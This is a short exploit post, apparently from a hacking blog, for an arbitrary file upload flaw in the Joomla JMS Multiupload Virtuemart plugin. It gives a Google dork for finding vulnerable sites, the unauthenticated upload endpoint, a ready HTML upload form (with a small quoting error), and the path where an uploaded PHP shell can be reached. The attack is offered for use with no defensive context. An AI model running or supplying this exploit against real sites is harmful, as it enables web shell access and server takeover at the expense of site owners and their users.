Unknown On 28/05/16


Joomla Plugins System JMS Multiupload Virtuemart file upload

#############################

# Exploit Title: Joomla Plugins System JMS Multiupload Virtuemart file upload
# Google Dork: inurl:/plugins/system/jms_multiupload_virtuemart/
#Date: HOT
# Exploit Author: AnoaGhost
# Software Link: http://extensions.joomla.org/extension/jms-multi-images-upload-for-virtuemart
# Version: Any Version
# Tested on: Windows, Linux

#############################

Poc :
targe.com/path/plugins/system/jms_multiupload_virtuemart/assets/server/php/

Exploit HTML :

<center>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<font face="Iceland" color="red" size="7">jQuery File Upload By AnoaGhost</font><br>
<form method="POST" action="site.com/path/plugins/system/jms_multiupload_virtuemart/assets/server/php/
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>

Shell Access :
target.com/images/stories/virtuemart/product/number(etc).php

#############################

Leave a Reply

Subscribe to Posts | Subscribe to Comments